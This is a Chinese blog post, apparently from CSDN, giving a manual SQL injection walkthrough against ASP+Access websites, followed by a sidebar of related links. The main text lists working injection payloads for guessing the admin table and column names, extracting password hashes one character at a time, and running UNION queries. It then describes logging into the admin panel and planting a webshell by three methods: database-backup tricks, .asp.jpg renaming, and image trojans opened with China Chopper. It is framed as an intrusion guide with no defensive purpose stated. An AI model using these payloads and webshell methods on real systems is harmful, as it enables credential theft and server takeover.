ASP+Access注入

最新推荐文章于 2023-06-03 17:51:52 发布
最新推荐文章于 2023-06-03 17:51:52 发布
阅读量637 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Liuhuaijin/article/details/77199846
版权

基础知识:ASP+MSAccess通常被用来开发简单的web应用程序,并在IIS上运行。较复杂的web应用程序则使用PHP+Mysql或者ASP+MSSQL开发。

判断是否为注入点:

通过添加单引号', 页面返回错误提示:Microsoft JET Database Engine 错误 ‘80040e14’

永真条件and 1=1和永假条件and 1=2

判断数据库类型:

内置变量判断数据库类型:

and user>0  //user是sql server的内置变量,字符类型为nvarchar 如与int比较 如果是sql server会直接报错,是Access会提示没有改变量

例如:Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e10' 
[Microsoft][ODBC Microsoft Access Driver] 参数不足,期待是 1。 

内置数据表判断数据库类型:

and (select count(*) from sysobjects)>=0      //SQL Server的系统表为sysobjects,在web环境下可正常读取

and (select count(*) from msysobjects)>=0  //Access的系统表为msysobjects,在web环境下没有权限读取

猜表名:

and exists (select * from admin) //exists指定一个子查询,返回布尔型

and (select count(*) from admin)>=0 //count用于统计表中所有字段

猜字段名(用户名和密码字段):

and exists(select id from admin)  //若表中存在id字段,则页面返回正常

and (select count(username) from admin)>=0  //表名猜出来后,将count(*)替换成count(字段名)

猜字段长度:

and exists (select id from admin where len(username)=5 and id=2)

and (select top 1 len(username) from admin)>4

and (select top 1 len(username) from admin)>5

猜字段数据:猜解Access只能使用ASCII逐字解码法

and (select top 1 asc(mid(username,1,1)) from admin)>0

and (select top 1 asc(mid(username,1,1)) from admin)<100

and (select top 1 asc(mid(username,1,1)) from admin)=50

例如:猜测md5密码为3995a800sd398d3d,然后对密码破解

寻找后台登录地址,登录后上传webshell:

一般后台都放在admin,message目录下,例如:http://www.baidu.com/admin/。可以使用猜到的账号和密码登录后台

导出数据库内容到文本文件:

select * into [test.txt] in 'd:\web\' 'text;' from admin //d:\web为网站路径

上传webshell:

前提条件:拿到管理员用户名和密码,进入后台才是一切入侵的基本条件。

进入后台后首先检查一下有没有数据库备份功能,假设有

方法1.上传一句话木马,将一句话木马写入数据库,备份数据库将一句话变成后缀为.asp文件,记录备份后的文件地址,然后通过客户端菜刀进行连接访问拿下webshell.

方法2.修改木马后缀名,将木马文件后缀名.asp改为.asp.jpg上传,记录文件上传路径,使用菜刀连接

方法3.构造asp图片木马:

1.构造木马图片,将数据库文件lubr.mdb插入到木马图片pic.jpg中,输出合成文件jim.jpg。例如:copy pic.jpg+lubr.mdb jim.jpg

2.上传木马图片,记录文件上传路径。例如:uploadfile/2017028.jpg;

3.客户端连接木马,使用中国菜刀。

SQL注入中的高效查询:

Order by猜字段数目:

order by 1

order by 2

Union select查询字段内容:

and 1=2 union select 1,字段名 from 表名

 

玄瞋
关注
小迪教程第九天——ASP+ACCESS注入/HTTP头注入
仲夏
10-20 1673
1、Asp+access注入1.表名获取不到1)看网站url地址 www.xxx.com/new.asp?id=45 www.xxx.com/e_news.asp?id=4 www.xxx.com/e_product.asp?id=4 尝试表名为e_的一种结构猜解2)看后台登录文件源码3)组合字典暴力猜解2.列名获取不到Access偏移注入2、http头注入HTTP_X_FORWARDED_
[转载]Python实现ASP+ACCESS注入的工具源代码
古道西丰的专栏
03-23 2229
Code:#!/usr/bin/python # ASP ACCESS SQL Injection Test # Written by ToToDoDo (QQ:8924007) Email: [email]osbbs@osbbs.com[/email] from sys import exit from urllib import urlopen from strin
asp+access注入网站源码
02-19
个人博客:实战初级SQL注入-access篇,所涉及的网站源码,如有侵权冒犯,请联系我。
ASP+ACCESSSQL注入网站源码
05-20
ASP+ACCESSSQL注入网站源码,完美适合网络安全初学者的SQL注入案例
SQL注入系列ASP+ACCESS手动注入(一)----数字
热门推荐
fendo
12-30 2万+
一、access数据库 1.简介 Microsoft Office Access是由微软发布的关系数据库管理系统。它结合了 MicrosoftJet Database Engine 和 图形用户界面两项特点,是 Microsoft Office 的系统程序之一。 Microsoft Office Access是微软把数据库引擎的图形用户界面和软件开发工具结合在一起的一
asp+access
noaighost的专栏
11-20 2331
AspAccess数据库连接入门2008-11-04 14:54     静态网页是指直接或间接制作成html的网页,这种网页的内容是固定的,修改和更新都必须要通过Dreamweaver、Frontpage等网页制作工具,而且只要修改了网页中的一个字符或一个图片都要重新上传一次覆盖原来的页面。     动态网页是以数据库技术为基础,以.asp、.jsp、.php、.per
asp+access注入源码.zip_asp+access注入_asp+access源代码_asp注入源码_渗透_渗透代码
09-24
ASP+Access注入是一种常见的Web应用程序安全漏洞,主要发生在使用ASP(Active Server Pages)技术构建的网站上,且数据库后端为Access。这类漏洞允许攻击者通过在URL、表单输入或者其他用户可控的数据源中插入SQL...
sp+access无防护注入源码.zip
02-24
标题中的"sp+access无防护注入源码.zip"指的是一个包含源代码的压缩包,这些源代码可能展示了ASPAccess数据库结合时,如何在没有防范措施的情况下容易遭受SQL注入攻击的情况。SQL注入是一种常见的Web应用程序安全...
ASP+ACCESS SQL注入漏洞修复代码
caizi001的专栏
05-07 3558
最近发现公司的网站被写入了些代码,应该是被注入入侵了,我们的企业网站是几年前做的,使用的是asp+access做的,现在在网上找到了一些修复漏洞的方法先给两种万能的防注入代码(放置conn.asp中) 第一种: squery=lcase(Request.ServerVariables("QUERY_STRING")) sURL=lcase(Request.ServerVariable
ASP+ACCESS教程
09-01
ASP+ACCESS教程(增、删、改、查),介绍ASPACCESS和使用方式
asp+access网站
03-28
自己曾经开发的asp+access的博客系统,支持发表文章、修改文章,有日历、投票、文章分类、留言回复、文章详细搜索、注册登陆系统、后台管理系统等。 界面友好,可以用来学习web开发设计,如果能够补充和完善,完全可以作为自己的独立博客使用。
ASP+ACCESS工作人员管理系统
01-08
本程序为原创,使用ASP+ACCESS数据库编写,可实现本单位工作人员的综合查询管理,查询结果可以直接输出为EXCEL文档,方便上报数据。 本系统为典的增、删、改、查数据管理系统,可分配多个用户,稍做修改即可变为任何类的管理系统。
工资管理系统ASP+ACCESS
05-30
人事管理系统是一个企事业单位不可缺少的部分,它的内容对于企事业单位的决策者和管理者来说都至关重要,所以企业人事管理系统应该能够为用户提供充足的信息和快捷的查询手段。但一直以来人们使用传统人工的方式管理文件信息,这种管理方式存在着许多缺点,如:效率低、保密性差,另外时间一长,将产生大量的文件和数据,这对于查找、更新和维护都带来了不少的困难。 随着科学技术的不断提高,计算机科学日渐成熟,其强大的功能已为人们深刻认识,它已进入人类社会的各个领域并发挥着越来越重要的作用。 作为计算机应用的一部分,使用计算机对人事信息进行管理,具有着手工管理所无法比拟的优点.例如:检索迅速、查找方便、可靠性高、存储量大、保密性好、寿命长、成本低等。这些优点能够极大地提高人事管理的效率,也是企业的科学化、正规化管理,与世界接轨的重要条件。 因此,开发这样一套管理软件成为很有必要的事情,在下面的各章中我们将以开发一套企业人事管理系统为例,谈谈其开发过程和所涉及到的问题及解决方法。 --------------摘要-------------- 人事管理系统是典的信息管理系统(MIS),其开发主要包括后台数据库的建立和维护以及前端应用程序的开发两个方面。对于前者要求建立起数据一致性和完整性强、数据安全性好的库。而对于后者则要求应用程序功能完备,易使用等特点。 经过分析,我们使用 MICROSOFT公司的 VISUAL BASIC开发工具,利用其提供的各种面向对象的开发工具,尤其是数据窗口这一能方便而简洁操纵数据库的智能化对象,首先在短时间内建立系统应用原,然后,对初始原系统进行需求迭代,不断修正和改进,直到形成用户满意的可行系统。 整个系统从符合操作简便、界面友好、灵活、实用、安全的要求出发。 论文主要介绍了本课题的开发背景,所要完成的功能和开发的过程。重点的说明了系统设计的重点、设计思想、难点技术和解决方案。 关键字 Visual Basic 6.0 Access2000 控件 窗体 域 Abstract The system of managing census register file is a typical application of managing information system (know as MIS),which mainly includes building up data-base of back-end and developing the application interface of front-end. The former required consistency and integrality and security of data. The later should make the application powerful and easily used. By looking up lots of datum, we selected Visual Basic presented by Microsoft because of its objective tools in Win32. VB offered a series of ActiveX operating a data-base. It can give you a short-cut to build up a prototype of system application. The prototype could be modified and developed till users are satisfied with it. Key Word Visual Basic 6.0、Access2000、ActiveX、Form、Field
通过ASP+ACCESS数据库网站注入检测教程.rar
06-01
通过该教程,能给ASP网站开发者一些网站检测经验
asp毕业设计——基于asp+access的网页设计辅导系统设计与实现(毕业论文+程序源码)——网页设计辅导系统
m0_66238867的博客
07-20 889
以信息技术为依托的现代网络教育对中国教育而言,既是挑战,更是机遇。抓住这个机遇,就会创造出教育领域中的一片新天地。本文主要通过构建网上教学系统,推动我校的网络教育的发展。提示以下为毕业论文的简略介绍,项目源码及完整毕业论文下载地址见文末。第一章前言1.1背景省略1.2工作的目的、内容在开发该在线教学系统的过程中,虽然没有网上商城系统那样复杂但是我还是运用了在学校学过的ASP技术,和以前学过的各种相关的网页制作工具lin.asp......
asp毕业设计——基于asp+access的网上教务系统设计与实现(毕业论文+程序源码)——网上教务系统
最新发布
m0_66238867的博客
06-03 630
对于一个学校来说,大量教师信息,学生信息管理,学生成绩管理,基本数据的维护都难于通过传统的方法进行管理:这就迫切需要利用计算机技术来帮助学校管理者处理这些日常管理。本系统正是为了简化教学任务的管理,提高办公效率,方便师生而设计的。本设计所完成的网上教务处管理系统主要实现的功能有:前台学生对班级情况、课程安排、学期成绩、和最新发布的教务信息的查询。后台管理员对全校教师信息、学生信息、学生成绩、课表安排等进行管理,即添加、删除、修改。同时发布新的公告等。
asp毕业设计——基于asp+access的房产信息管理系统设计与实现(毕业论文+程序源码)——房产信息管理系统
m0_66238867的博客
07-15 1309
建立一个提供房产信息的网站为例,介绍了如何使用ASP技术在Internet上建立一个信息系统,供用户通过WWW动态地访问Web数据库中的数据。提示以下为毕业论文的简略介绍,项目源码及完整毕业论文下载地址见文末。前言1.1省略房产信息管理系统的设计目标是立足于开发一套简单易用,方便快捷,功能强大的信息管理系统。简单易用意味着系统简易,美观的图形操作界面。界面的设计将采用专业的图形图像设计处理软件Photoshop。方便快捷意味着系统的即装即用,简单的服务器架构及系统安装。数据流名用户信息。......
ASP+acc手工注入
rjgcwl的专栏
01-14 629
ASP+acc手工注入 SQL注入这么长时间,看见有的朋友还是不会手工注入,那么我来演示一下。高手略过。我们大家知道,一般注入产生在没经过虑的变量上,像ID?=XX这样的。下面以这个网址为例:http://zsb.xxx.edu.cn/2j.asp?id=24 and 1=1 返回了正常http://zs
ASP+Access SQL注入测试工具使用教程
从标题和描述中我们可以了解到,这是一套用于测试ASP(Active Server Pages)环境下的SQL注入攻击的工具。SQL注入是一种常见的网络安全攻击手段,攻击者通过在应用程序的SQL查询中插入恶意SQL代码片段,试图对后端...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值